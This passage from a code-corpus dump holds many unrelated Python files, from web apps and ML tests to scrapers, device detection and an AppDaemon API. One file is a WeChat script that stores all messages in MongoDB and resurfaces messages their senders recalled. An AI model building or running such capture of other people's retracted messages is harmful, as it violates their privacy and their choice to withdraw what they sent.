d.pop("ignore_parent")
return d
@classmethod
def from_dict(cls, d: dict) -> "EmptyStrategy":
assert not d
return cls()
def __repr__(self) -> str:
return self.__class__.__name__ + "()"
def __str__(self) -> str:
return "the empty strategy"
class StrategyFactory(abc.ABC, Generic[CombinatorialClassType]):
"""
The StrategyFactory class can be used instead of the Strategy class if
you wish to expand a combinatorial class with a family of strategies.
"""
@abc.abstractmethod
def __call__(
self, comb_class: CombinatorialClassType, **kwargs
) -> Iterator[Union[AbstractRule, AbstractStrategy]]:
"""
Returns the results of the strategy on a comb_class.
"""
@abc.abstractmethod
def __str__(self) -> str:
"""
Return the name of the strategy.
"""
@abc.abstractmethod
def __repr__(self) -> str:
pass
def __eq__(self, other: object) -> bool:
return self.__class__ == other.__class__ and self.__dict__ == other.__dict__
def __hash__(self) -> int:
"""
Hash function for the strategy.
As we don't expect a use case were many object for the same class
strategy are used. This hash function should perform correctly.
# TODO: do better, why is it hashable at all?
"""
return hash(self.__class__)
def to_jsonable(self) -> dict:
"""
Return a dictionary form of the strategy.
"""
c = self.__class__
return {
"class_module": c.__module__,
"strategy_class": c.__name__,
}
@classmethod
@abc.abstractmethod
def from_dict(cls, d: dict) -> CSSstrategy:
"""
Return the strategy from the json representation.
"""
return strategy_from_dict(d)
|
py | 7df7dad8bd15d05b6a3497421a711491cf79a3b7 | from typing import Optional
from fastapi import FastAPI
app = FastAPI()
@app.get("/")
def read_root():
return {"Hello": "World"}
@app.get("/items/{item_id}")
def read_item(item_id: int, q: Optional[str] = None):
return {"item_id": item_id, "q": q}
|
py | 7df7db05c839eaeef3987a1796b568ab064a80e3 | """
Business logic how to
- create a game
- join a game
"""
import random
from spacetrading.logic import gamesettings
from spacetrading.models import Game, Player, Planet
def create_game(data, user):
"""
create a game with
- name (string)
- 1 <= number_of_players <= 4
- play_all_players (bool)
- user (Django user)
"""
name = data['name']
number_of_players = data['number_of_players']
play_all_players = data['play_all_players']
resource_limit = data['resource_limit']
midgame_scoring = data.get('midgame_scoring', False)
finish_time = data.get('finish_time', gamesettings.FINISH_TIME)
start_influence = data.get('start_influence', gamesettings.START_INFLUENCE)
game = Game.objects.create_game(
game_name=name,
number_of_players=number_of_players,
offer_demand_event_time=gamesettings.OFFER_DEMAND_EVENT_TIMES[number_of_players-1],
resource_limit=resource_limit,
midgame_scoring=midgame_scoring,
midgame_scoring_event_time=finish_time/2,
finish_time=finish_time,
start_influence=start_influence
)
demand_resources = ['1', '5', '2', '3', '4']
remaining_supply_resources = {'1', '2', '3', '4', '5'}
supply_resources = []
for i in range(3):
demand_resource = random.sample(remaining_supply_resources - set(demand_resources[i]), 1)[0]
remaining_supply_resources.remove(demand_resource)
supply_resources.append(demand_resource)
remaining_supply_resources = list(remaining_supply_resources)
random.shuffle(remaining_supply_resources)
if demand_resources[3] is remaining_supply_resources[0] or demand_resources[4] is remaining_supply_resources[1]:
supply_resources.append(remaining_supply_resources[1])
supply_resources.append(remaining_supply_resources[0])
else:
supply_resources.append(remaining_supply_resources[0])
supply_resources.append(remaining_supply_resources[1])
player = Player.objects.create_player(
user=user,
colour="#FF0000",
ship_offset=[0, 0],
player_number=0
)
game.players.add(player)
supply_prices = random.sample(
gamesettings.SETUP_PLANET_SUPPLY_PRICE,
len(gamesettings.SETUP_PLANET_SUPPLY_PRICE)
)
demand_prices = random.sample(
gamesettings.SETUP_PLANET_DEMAND_PRICE,
len(gamesettings.SETUP_PLANET_DEMAND_PRICE)
)
for index, current_planet in enumerate(gamesettings.PLANETS):
planet = Planet.objects.create_planet(
name=current_planet[0],
colour=current_planet[2],
number_of_hexes=current_planet[1],
current_position=random.randint(0, current_planet[1] - 1),
planet_demand_resource=demand_resources[index],
planet_demand_resource_price=demand_prices[index],
planet_supply_resource=supply_resources[index],
planet_supply_resource_price=supply_prices[index],
position_of_hexes=current_planet[3],
radius_x=current_planet[4][0],
radius_y=current_planet[4][1],
offset=current_planet[5],
planet_number=index
)
game.planets.add(planet)
if number_of_players == 1:
game.game_state = 'r'
game.save()
player.save()
if play_all_players:
for _ in range(number_of_players - 1):
join_game(game.id, user)
def join_game(primary_key_game, user):
"""
join an open game
- primary_key_game is the id of the game we want to join
- user is the Django user which wants to join
"""
game = Game.objects.get(pk=primary_key_game)
number_of_joined_players = game.players.count()
if number_of_joined_players >= game.number_of_players or number_of_joined_players > 3:
return
colours = ["#FF0000", "#0000FF", "#FFFFFF", "#00FF00"]
offsets = [[0, 0], [-10, 0], [-10, -15], [0, -15]]
player = Player.objects.create_player(
user=user,
colour=colours[number_of_joined_players],
ship_offset=offsets[number_of_joined_players],
player_number=number_of_joined_players
)
game.players.add(player)
if number_of_joined_players == game.number_of_players - 1:
players = game.players.all()
player_numbers = list(range(len(players)))
random.shuffle(player_numbers)
for index, current_player in enumerate(players):
current_player.player_number = player_numbers[index]
current_player.last_move = -current_player.player_number - 1
current_player.money = 10 + game.number_of_players - \
current_player.player_number - 1
current_player.save()
game.game_state = 'r'
elif number_of_joined_players > game.number_of_players - 1:
game.players.remove(player)
player.delete()
game.save()
|
py | 7df7db099f573a3adfc05c75f3f8d04a61637dac | # -*- coding: utf-8 -*-
"""
1-原作者
作者:AlicFeng
链接:https://www.jianshu.com/p/712d19374b2e
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
2-增加了储存mongodb
3-增加了docker
"""
from gevent import monkey
monkey.patch_all()
import os
import re
import time
import itchat
import gevent
from itchat.content import *
from dbdriver import MongoBase
# 说明:可以撤回的有文本文字、语音、视频、图片、位置、名片、分享、附件
# {msg_id:(msg_from,msg_to,msg_time,msg_time_rec,msg_type,msg_content,msg_share_url)}
msg_dict = {}
# 文件存储临时目录
rev_tmp_dir = "./RevDir/"
if not os.path.exists(rev_tmp_dir): os.mkdir(rev_tmp_dir)
# 表情有一个问题 | 接受信息和接受note的msg_id不一致 巧合解决方案
face_bug = None
# 增加数据库部分
store = MongoBase('172.17.0.2', '27017')
store.switchDataBase('wechat')
# 将接收到的消息存放在字典中,当接收到新消息时对字典中超时的消息进行清理 | 不接受不具有撤回功能的信息
# [TEXT, PICTURE, MAP, CARD, SHARING, RECORDING, ATTACHMENT, VIDEO, FRIENDS, NOTE]
@itchat.msg_register([TEXT, PICTURE, MAP, CARD, SHARING, RECORDING, ATTACHMENT, VIDEO])
def handler_receive_msg(msg):
global face_bug
# 获取的是本地时间戳并格式化本地时间戳 e: 2017-04-21 21:30:08
msg_time_rec = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
# 消息ID
msg_id = msg['MsgId']
# 消息时间
msg_time = msg['CreateTime']
# 消息发送人昵称 | 这里也可以使用RemarkName备注 但是自己或者没有备注的人为None
msg_from_user = msg['FromUserName']
msg_to_user = msg['ToUserName']
msg_from = (itchat.search_friends(userName=msg_from_user))["NickName"]
msg_to = (itchat.search_friends(userName=msg_to_user))["NickName"]
# 消息内容
msg_content = None
# 分享的链接
msg_share_url = None
if msg['Type'] == 'Text' \
or msg['Type'] == 'Friends':
msg_content = msg['Text']
elif msg['Type'] == 'Recording' \
or msg['Type'] == 'Attachment' \
or msg['Type'] == 'Video' \
or msg['Type'] == 'Picture':
msg_content = r"" + msg['FileName']
# 保存文件
msg['Text'](rev_tmp_dir + msg['FileName'])
elif msg['Type'] == 'Card':
msg_content = msg['RecommendInfo']['NickName'] + r" 的名片"
elif msg['Type'] == 'Map':
x, y, location = re.search(
"<location x=\"(.*?)\" y=\"(.*?)\".*label=\"(.*?)\".*", msg['OriContent']).group(1, 2, 3)
if location is None:
msg_content = r"纬度->" + x.__str__() + " 经度->" + y.__str__()
else:
msg_content = r"" + location
elif msg['Type'] == 'Sharing':
msg_content = msg['Text']
msg_share_url = msg['Url']
face_bug = msg_content
# 更新字典
msg_dict.update(
{
msg_id: {
"msg_from": msg_from, "msg_time": msg_time, "msg_time_rec": msg_time_rec,
"msg_type": msg["Type"],
"msg_content": msg_content, "msg_share_url": msg_share_url
}
}
)
msg_info_text = dict()
msg_info_text['send_user_id'] = msg_from_user
msg_info_text['recv_user_id'] = msg_to_user
msg_info_text['local_time'] = msg_time_rec
msg_info_text['msg_id'] = msg_id
msg_info_text['msg_time'] = msg_time
msg_info_text['msg_from'] = msg_from
msg_info_text['msg_to'] = msg_to
msg_info_text['msg_content'] = msg_content
store.conCollection('text')
a = store.inserDocument(msg_info_text)
# 收到note通知类消息,判断是不是撤回并进行相应操作
@itchat.msg_register(NOTE)
def send_msg_helper(msg):
global face_bug
if re.search(r"CDATA", msg['Content']) is not None:
if len(msg_dict) == 0:
return
# 获取消息的id
old_msg_id = re.search("\<msgid\>(.*?)\<\/msgid\>", msg['Content']).group(1)
old_msg = msg_dict.get(old_msg_id, {})
recal_text = old_msg['msg_content']
if len(old_msg_id) < 11:
itchat.send_file(rev_tmp_dir + face_bug, toUserName='filehelper')
os.remove(rev_tmp_dir + face_bug)
else:
msg_body = 'Monitor: ' + '\n' \
+ old_msg.get('msg_from') + ' recall ' + old_msg.get('msg_type') + ' msg ' + '\n' \
+ old_msg.get('msg_time_rec') + '\n' \
+ recal_text
#msg_body = "检测到~" + "\n" \
# + old_msg.get('msg_from') + " 撤回了 " + old_msg.get("msg_type") + " 消息" + "\n" \
# + old_msg.get('msg_time_rec') + "\n" \
# + "撤回了什么 ⇣" + "\n" \
# + r"" + old_msg.get('msg_content').decode('utf-8')
# 如果是分享存在链接
if old_msg['msg_type'] == "Sharing": msg_body += "\n就是这个链接➣ " + old_msg.get('msg_share_url')
# 将撤回消息发送到文件助手
itchat.send(msg_body, toUserName='filehelper')
# 有文件的话也要将文件发送回去
if old_msg["msg_type"] == "Picture" \
or old_msg["msg_type"] == "Recording" \
or old_msg["msg_type"] == "Video" \
or old_msg["msg_type"] == "Attachment":
file = '@fil@%s' % (rev_tmp_dir + old_msg['msg_content'])
itchat.send(msg=file, toUserName='filehelper')
os.remove(rev_tmp_dir + old_msg['msg_content'])
# 删除字典旧消息
msg_dict.pop(old_msg_id)
def login():
itchat.auto_login(hotReload=True,enableCmdQR=2)
itchat.run()
def run():
gevent.joinall([gevent.spawn(login)])
|
py | 7df7db27c63c0620e69562409874c1b769d17a47 | import os
import numpy as np
import pandas as pd
from datto.ModelResults import ModelResults
from sklearn.linear_model import ElasticNet, LogisticRegression
from sklearn.tree import DecisionTreeClassifier
mr = ModelResults()
X_train = pd.DataFrame(
[
[1434, 56456, 1],
[323, 768, 0],
[5435, 564746456, 0],
[544, 55567, 21],
[57978, 58, 2],
[437, 336, 1],
[544565, 858, 4],
[456547, 56456, 10],
],
columns=["id", "webpage", "count"],
)
y_train = np.array([1, 1, 1, 0, 1, 0, 0, 1])
X_test = pd.DataFrame(
[
[234, 35656, 1],
[7878, 435345, 0],
[3454, 345, 0],
[78758, 345, 21],
[234234, 5477, 2],
[654757, 356536, 1],
[345, 457457, 4],
[234, 345, 10],
],
columns=["id", "webpage", "count"],
)
y_test = np.array([1, 0, 0, 0, 1, 0, 0, 1])
X_text = pd.DataFrame(
[
["some text", 1],
["some other text", 1],
["i like bananas", 2],
["i like apples", 2],
["running is fun", 3],
["jumping is fun running is fun", 3],
["do you read mysteries? running is fun", 4],
["do you read nonfiction?", 4],
["some text", 1],
["some other text", 1],
["i like bananas", 2],
["i like apples", 2],
["running is fun", 3],
["jumping is fun running is fun", 3],
["do you read mysteries? running is fun", 4],
["do you read nonfiction?", 4],
["some text", 1],
["some other text", 1],
["i like bananas", 2],
["i like apples", 2],
["running is fun", 3],
["jumping is fun running is fun", 3],
["do you read mysteries? running is fun", 4],
["do you read nonfiction?", 4],
],
columns=["text", "group_id"],
)
def test_most_similar_texts():
num_topics = 4
num_examples = 5
text_column_name = "text"
chosen_stopwords = set(["the"])
top_words_df, _, _ = mr.most_similar_texts(
X_text,
num_examples,
text_column_name,
num_topics,
chosen_stopwords,
min_df=3,
max_df=0.4,
min_ngrams=1,
max_ngrams=3,
)
assert top_words_df.shape[0] == num_topics
def test_most_common_words_by_group():
results_df = mr.most_common_words_by_group(X_text, "text", "group_id", 3, 1, 3)
assert X_text["group_id"].nunique() == results_df.shape[0]
def test_score_final_model_classification():
model = LogisticRegression()
trained_model = model.fit(X_train, y_train)
_, y_predicted = mr.score_final_model(
"classification", X_test, y_test, trained_model
)
assert len(y_predicted) == y_test.shape[0]
def test_score_final_model_regression():
model = ElasticNet()
trained_model = model.fit(X_train, y_train)
_, y_predicted = mr.score_final_model("regression", X_test, y_test, trained_model)
assert len(y_predicted) == y_test.shape[0]
def test_coefficients_graph_classification():
model = LogisticRegression()
model.fit(X_train, y_train)
shap_values = mr.coefficients_graph(
X_train, X_test, model, "classification", "classification_test"
)
assert isinstance(shap_values, np.ndarray)
def test_coefficients_graph_regression():
model = ElasticNet()
model.fit(X_train, y_train)
shap_values = mr.coefficients_graph(
X_train, X_test, model, "regression", "regression_test"
)
assert isinstance(shap_values, np.ndarray)
def test_coefficients_individual_predictions_classification():
model = LogisticRegression()
trained_model = model.fit(X_train, y_train)
id_col = "id"
num_id_examples = 3
num_feature_examples = 5
model_type = "classification"
class_names = ["False", "True"]
features_list = mr.coefficients_individual_predictions(
trained_model,
X_train,
X_train,
X_test,
id_col,
num_id_examples,
num_feature_examples,
model_type,
class_names,
)
assert isinstance(features_list, list)
def test_coefficients_individual_predictions_regression():
model = ElasticNet()
trained_model = model.fit(X_train, y_train)
id_col = "id"
num_id_examples = 3
num_feature_examples = 5
model_type = "regression"
features_list = mr.coefficients_individual_predictions(
trained_model,
X_train,
X_train,
X_test,
id_col,
num_id_examples,
num_feature_examples,
model_type,
)
assert isinstance(features_list, list)
def test_score_final_model_multiclass():
y_train = pd.DataFrame(
[
[1, 1],
[1, 0],
[1, 1],
[1, 1],
[1, 0],
[1, 0],
[0, 1],
[1, 1],
],
columns=["var1", "var2"],
)
y_test = pd.DataFrame(
[
[1, 1],
[1, 0],
[1, 1],
[1, 1],
[1, 0],
[1, 0],
[0, 1],
[1, 1],
],
columns=["var1", "var2"],
)
model = DecisionTreeClassifier()
trained_model = model.fit(X_train, y_train)
_, y_predicted = mr.score_final_model(
"classification", X_test, y_test, trained_model, multiclass=True
)
assert len(y_predicted) == y_test.shape[0]
def test_coefficients_summary_multiclass():
y_train = pd.DataFrame(
[
[1, 1],
[1, 0],
[1, 1],
[1, 1],
[1, 0],
[1, 0],
[0, 1],
[1, 1],
],
columns=["var1", "var2"],
)
# For some reason this errors if using more than one feature
results_df = mr.coefficients_summary(
pd.DataFrame(X_train["count"]), y_train, 5, 3, "classification", multiclass=True
)
assert results_df.shape[0] == 1
def test_coefficients_summary_classification():
results_df = mr.coefficients_summary(
pd.DataFrame(X_train["count"]), y_train, 5, 3, "classification"
)
assert results_df.shape[0] == 1
def test_coefficients_summary_regression():
results_df = mr.coefficients_summary(
pd.DataFrame(X_train["count"]), y_train, 5, 3, "regression"
)
assert results_df.shape[0] == 1
def test_get_tree_diagram():
path = "../images/"
model = DecisionTreeClassifier()
model.fit(X_train, y_train)
mr.get_tree_diagram(model, X_train, path)
assert os.path.exists(f"{path}decision-tree.png")
def test_coefficients_graph_multiclass():
model = DecisionTreeClassifier()
y_train = pd.DataFrame(
[
[1, 1],
[1, 0],
[1, 1],
[1, 1],
[1, 0],
[1, 1],
[0, 1],
[1, 1],
],
columns=["var1", "var2"],
)
model.fit(X_train, y_train)
shap_values = mr.coefficients_graph(
X_train,
X_test,
model,
"classification",
"multiclass_test",
multiclass=True,
y_test=y_train,
)
assert isinstance(shap_values, np.ndarray)
|
py | 7df7db28f7877f28e6100fa53acbf9c192bd206a | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
class DeviceType:
CPU = 'cpu'
GPU = 'gpu'
XPU = 'xpu'
NPU = 'npu'
MLU = 'mlu'
class Device(object):
def __init__(self, dtype=None, memory="", labels=""):
self._dtype = dtype
self._memory = memory
self._labels = labels
def __str__(self):
return ",".join(self._labels)
@property
def dtype(self):
return self._dtype
@property
def count(self):
return len(self._labels) or 1
@property
def memory(self):
return self._memory
@property
def labels(self):
return self._labels
@labels.setter
def labels(self, lbs):
if isinstance(lbs, str):
self._labels = lbs.split(',')
elif isinstance(lbs, list):
self._labels = lbs
else:
self._labels = []
def get_selected_device_key(self):
if self._dtype == DeviceType.CPU:
return 'FLAGS_selected_cpus'
if self._dtype == DeviceType.GPU:
return 'FLAGS_selected_gpus'
if self._dtype == DeviceType.NPU:
return 'FLAGS_selected_npus'
if self._dtype == DeviceType.XPU:
return 'FLAGS_selected_xpus'
if self._dtype == DeviceType.MLU:
return 'FLAGS_selected_mlus'
return 'FLAGS_selected_devices'
def get_selected_devices(self, devices=''):
'''
return the device label/id relative to the visible devices
'''
if not devices:
return [str(x) for x in range(0, len(self._labels))]
else:
devs = [x.strip() for x in devices.split(',')]
return [str(self._labels.index(d)) for d in devs]
@classmethod
def parse_device(self):
dev = Device()
visible_devices = None
if 'CUDA_VISIBLE_DEVICES' in os.environ or 'NVIDIA_VISIBLE_DEVICES' in os.environ:
dev._dtype = DeviceType.GPU
visible_devices = os.getenv("CUDA_VISIBLE_DEVICES") or os.getenv(
"NVIDIA_VISIBLE_DEVICES")
elif 'XPU_VISIBLE_DEVICES' in os.environ:
dev._dtype = DeviceType.XPU
visible_devices = os.getenv("XPU_VISIBLE_DEVICES")
elif 'ASCEND_VISIBLE_DEVICES' in os.environ:
dev._dtype = DeviceType.NPU
visible_devices = os.getenv("ASCEND_VISIBLE_DEVICES")
elif 'MLU_VISIBLE_DEVICES' in os.environ:
dev._dtype = DeviceType.MLU
visible_devices = os.getenv("MLU_VISIBLE_DEVICES")
if visible_devices is not None and visible_devices != 'all':
dev._labels = visible_devices.split(',')
else:
return self.detect_device()
return dev
@classmethod
def detect_device(self):
import paddle.fluid as fluid
dev = Device()
num = 0
visible_devices = None
if fluid.core.is_compiled_with_cuda():
dev._dtype = DeviceType.GPU
num = fluid.core.get_cuda_device_count()
visible_devices = os.getenv("CUDA_VISIBLE_DEVICES") or os.getenv(
"NVIDIA_VISIBLE_DEVICES")
elif fluid.core.is_compiled_with_xpu():
dev._dtype = DeviceType.XPU
num = fluid.core.get_xpu_device_count()
visible_devices = os.getenv("XPU_VISIBLE_DEVICES")
elif fluid.core.is_compiled_with_npu():
dev._dtype = DeviceType.NPU
num = fluid.core.get_npu_device_count()
visible_devices = os.getenv("ASCEND_VISIBLE_DEVICES")
elif fluid.core.is_compiled_with_mlu():
dev._dtype = DeviceType.MLU
num = fluid.core.get_mlu_device_count()
visible_devices = os.getenv("MLU_VISIBLE_DEVICES")
if num == 0:
dev._dtype = DeviceType.CPU
elif visible_devices is None or visible_devices == "all":
dev._labels = [str(x) for x in range(0, num)]
else:
dev._labels = visible_devices.split(',')
return dev
if __name__ == '__main__':
d = Device.parse_device()
print(d.get_selected_devices())
|
py | 7df7dc766375d117f390c6683149da074a65c33f | # Minimal HX711 driver demo
import board
from hx711_pio import HX711_PIO
pin_data = board.D5
pin_clk = board.D6
hx711 = HX711_PIO(pin_data, pin_clk)
while True:
print(hx711.read_raw()) |
py | 7df7dcd26f6ce25787e34598adc8552f42b9fb03 | import csv
from datetime import date
import dataclasses
import time
from typing import List
import geojson
from lxml import html
from selenium.webdriver import Firefox
from helpers import extract_latitude, extract_longitude
@dataclasses.dataclass
class Certificate:
id: str
status: str
holder: str
scope: str
materials: str
valid_from: str
valid_to: str
body_short: str
latitude: float
longitude: float
certificate_url: str
audit_url: str
downloaded: str
@classmethod
def prepare_fieldnames(cls):
return list(cls.__dataclass_fields__.keys())
@property
def __geo_interface__(self):
return {
'type': 'Feature',
'geometry': {
'type': 'Point',
'coordinates': (self.longitude, self.latitude),
},
'id': self.id,
'properties': {
'holder': self.holder,
'body': self.body_short,
'valid_from': self.valid_from,
'valid_to': self.valid_to,
},
}
URL = "https://www.iscc-system.org/certificates/valid-certificates/"
def data_to_csv(data: List[Certificate], filename: str = 'valid-certificates.csv'):
"""Save list with certificates to csv file."""
with open(filename, 'w') as csvf:
writer = csv.DictWriter(csvf, fieldnames=Certificate.prepare_fieldnames())
writer.writeheader()
for cert in data:
writer.writerow(dataclasses.asdict(cert))
def cert_dict_from_tablerow(tr: html.HtmlElement) -> dict:
"""Take tablerow and prepare a dictionary representing one certificate.
Find data with xpath and clean them if necessary.
"""
cert = {}
xpath_map = {
'id': 'td[@class=" column-cert_number"]/text()',
'holder': 'td[contains(@class, "column-cert_owner")]/span/text()',
'scope': 'td[contains(@class, "column-cert_certified_as")]/span/text()',
'materials': 'td[contains(@class, "column-cert_in_put")]/text()',
'valid_from': 'td[contains(@class, "column-cert_valid_from")]/text()',
'valid_to': 'td[contains(@class, "column-cert_valid_until")]/text()',
'body_short': 'td[contains(@class, "column-cert_issuer")]/span/text()',
'latitude': 'td[contains(@class, "column-cert_map")]/a/@href',
'longitude': 'td[contains(@class, "column-cert_map")]/a/@href',
'certificate_url': 'td[contains(@class, "column-cert_file")]/a/@href',
'audit_url': 'td[contains(@class, "column-cert_audit")]/a/@href',
}
clean_map = {
'latitude': extract_latitude,
'longitude': extract_longitude,
'certificate_url': str.strip,
'audit_url': str.strip,
}
cert['status'] = 'valid'
for k, v in xpath_map.items():
try:
if k in clean_map:
clean_func = clean_map[k]
cert[k] = clean_func(tr.xpath(v)[0])
else:
cert[k] = tr.xpath(v)[0]
except IndexError:
cert[k] = None #type: ignore
cert['downloaded'] = date.today().isoformat()
return cert
def parse_tree(tree: html.HtmlElement) -> List[Certificate]:
"""Parse the web page and return list with certificates."""
trs = tree.xpath('//table[@id="table_1"]/tbody/tr')
# Parse data from table rows
data = []
for tr in trs:
cert_dict = cert_dict_from_tablerow(tr)
cert = Certificate(**cert_dict)
data.append(cert)
return data
def main():
driver = Firefox()
driver.get(URL)
try:
driver.implicitly_wait(10)
# First click on the default table length button
driver.find_element_by_id('table_1_length').click()
# Select All from the dropdown menu
driver.find_element_by_xpath('//li[@data-original-index="6"]').click()
time.sleep(15)
# Parse html string to lxml tree
tree = html.document_fromstring(driver.page_source)
# Get all table rows
data = parse_tree(tree)
finally:
driver.close()
data_to_csv(data)
if __name__ == '__main__':
main()
|
py | 7df7dd673f4884f05b9688548652da4a4d4765e5 | # A script written for a friend
# who needed a way to get tweets
# with sentiment data, to use
# for a time series analysis
# to predict stock price changes.
import tweepy
import numpy as np
from nltk.sentiment.vader import SentimentIntensityAnalyzer
import pandas as pd
import pynance
import os
cwd = os.getcwd()
search_term = input("Enter search term: ")
# Consumer keys and access tokens, used for OAuth
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''
# OAuth process, using the keys and tokens
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# Creation of the actual interface, using authentication
api = tweepy.API(auth)
# Sample method, used to update a status
sid = SentimentIntensityAnalyzer()
tweets = api.search(search_term, count=100)
df = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['Tweets'])
df['Sentiment'] = df['Tweets'].apply(lambda x: sid.polarity_scores(x))
df['Good_Bad'] = df['Sentiment'].apply(lambda x: x['compound'])
df.to_csv(cwd + f"/{search_term}")
print(df)
|
py | 7df7de47698cd49b9f810e5d512010eef1046b30 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import kfp.dsl as dsl
import kfp.compiler
import os
import shutil
import subprocess
import sys
import tempfile
from deprecated.sphinx import deprecated
def parse_arguments():
"""Parse command line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument('--py',
type=str,
help='local absolute path to a py file.')
parser.add_argument('--function',
type=str,
help='The name of the function to compile if there are multiple.')
parser.add_argument('--namespace',
type=str,
help='The namespace for the pipeline function')
parser.add_argument('--output',
type=str,
required=True,
help='local path to the output workflow yaml file.')
parser.add_argument('--disable-type-check',
action='store_true',
help='disable the type check, default is enabled.')
args = parser.parse_args()
return args
def _compile_pipeline_function(pipeline_funcs, function_name, output_path, type_check):
if len(pipeline_funcs) == 0:
raise ValueError('A function with @dsl.pipeline decorator is required in the py file.')
if len(pipeline_funcs) > 1 and not function_name:
func_names = [x.__name__ for x in pipeline_funcs]
raise ValueError('There are multiple pipelines: %s. Please specify --function.' % func_names)
if function_name:
pipeline_func = next((x for x in pipeline_funcs if x.__name__ == function_name), None)
if not pipeline_func:
raise ValueError('The function "%s" does not exist. '
'Did you forget @dsl.pipeline decoration?' % function_name)
else:
pipeline_func = pipeline_funcs[0]
kfp.compiler.Compiler().compile(pipeline_func, output_path, type_check)
class PipelineCollectorContext():
def __enter__(self):
pipeline_funcs = []
def add_pipeline(func):
pipeline_funcs.append(func)
return func
self.old_handler = dsl._pipeline._pipeline_decorator_handler
dsl._pipeline._pipeline_decorator_handler = add_pipeline
return pipeline_funcs
def __exit__(self, *args):
dsl._pipeline._pipeline_decorator_handler = self.old_handler
def compile_pyfile(pyfile, function_name, output_path, type_check):
sys.path.insert(0, os.path.dirname(pyfile))
try:
filename = os.path.basename(pyfile)
with PipelineCollectorContext() as pipeline_funcs:
__import__(os.path.splitext(filename)[0])
_compile_pipeline_function(pipeline_funcs, function_name, output_path, type_check)
finally:
del sys.path[0]
def main():
args = parse_arguments()
if args.py is None:
raise ValueError('The --py option must be specified.')
compile_pyfile(
args.py,
args.function,
args.output,
not args.disable_type_check,
)
|
py | 7df7df3463cc73a341b23a79277868f73966135f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.views.generic import View
from django.shortcuts import render
from django.http import HttpResponse
import logging
import datetime
from kubernetes.client.rest import ApiException
from kubernetes import client, config
from pprint import pprint
import json
logger = logging.getLogger('django')
# Create your views here.
class QueryPv(View):
def __init__(self):
super(QueryPv, self).__init__()
self.return_data = []
self.v1 = client.CoreV1Api()
def get(self, request):
return render(request, 'querypv.html')
def post(self, request):
req_dict = {}
ret_list = []
ns_list = []
method = None
name = None
pvs = self.v1.list_persistent_volume(watch=False)
print type(pvs)
if request.body and request.body.strip() != '{}':
req_dict = json.loads(request.body)
method = req_dict['method'] if 'method' in req_dict and req_dict['method'].strip() != '' else 'query'
name = req_dict['name'] if 'name' in req_dict and req_dict['name'].strip() != '' else None
#label = req_dict['label'] if 'label' in req_dict and req_dict['label'].strip() != '' else None
#status = req_dict['status'].lower() if 'status' in req_dict and req_dict['status'].strip() != '' else None
#logger.debug('3 var is: %(pod_name)s %(host_ip)s %(namespace)s', req_dict)
for i in pvs.items:
if name and name not in i.metadata.name:
continue
ret_name = i.metadata.name
ret_status = i.status.phase
ret_capacity = i.spec.capacity['storage']
ret_mode = i.spec.access_modes
ret_claimref = i.spec.claim_ref.name
ret_list.append({'field1': ret_name, 'field2': ret_capacity, 'field3': ret_mode, 'field4': ret_claimref, 'field5': ret_status})
if method and method == 'query':
pass
ret_title = ('name', 'capacity', 'access_mode', 'claimref', 'status')
ret_dict = {'items': ret_list, 'title': ret_title, 'detail_data': pvs}
ret_data = json.dumps(ret_dict)
return HttpResponse(ret_data)
|
py | 7df7dfaa62adc009239af41a874b6cca72a9ccd9 | import datetime
import inspect
import iso8601
import re
from datetime import timedelta
import appdaemon.utils as utils
from appdaemon.appdaemon import AppDaemon
class ADAPI:
#
# Internal
#
def __init__(self, ad: AppDaemon, name, logging_obj, args, config, app_config, global_vars):
# Store args
self.AD = ad
self.name = name
self._logging = logging_obj
self.config = config
self.app_config = app_config
self.args = args
self.global_vars = global_vars
self._namespace = "default"
self.logger = self._logging.get_child(name)
self.err = self._logging.get_error().getChild(name)
self.user_logs = {}
if "log_level" in args:
self.logger.setLevel(args["log_level"])
self.err.setLevel(args["log_level"])
if "log" in args:
userlog = self.get_user_log(args["log"])
if userlog is not None:
self.logger = userlog
@staticmethod
def _sub_stack(msg):
# If msg is a data structure of some type, don't sub
if type(msg) is str:
stack = inspect.stack()
if msg.find("__module__") != -1:
msg = msg.replace("__module__", stack[2][1])
if msg.find("__line__") != -1:
msg = msg.replace("__line__", str(stack[2][2]))
if msg.find("__function__") != -1:
msg = msg.replace("__function__", stack[2][3])
return msg
def _get_namespace(self, **kwargs):
if "namespace" in kwargs:
namespace = kwargs["namespace"]
del kwargs["namespace"]
else:
namespace = self._namespace
return namespace
#
# Logging
#
def _log(self, logger, msg, *args, **kwargs):
msg = self._sub_stack(msg)
if "level" in kwargs:
level = kwargs.get("level", "INFO")
kwargs.pop("level")
else:
level = "INFO"
ascii_encode = kwargs.get("ascii_encode", True)
if ascii_encode is True:
safe_enc = lambda s: str(s).encode("utf-8", "replace").decode("ascii", "replace")
msg = safe_enc(msg)
logger.log(self._logging.log_levels[level], msg, *args, **kwargs)
def log(self, msg, *args, **kwargs):
if "log" in kwargs:
# Its a user defined log
logger = self.get_user_log(kwargs["log"])
kwargs.pop("log")
else:
logger = self.logger
self._log(logger, msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self._log(self.err, msg, *args, **kwargs)
def listen_log(self, cb, level="INFO", **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
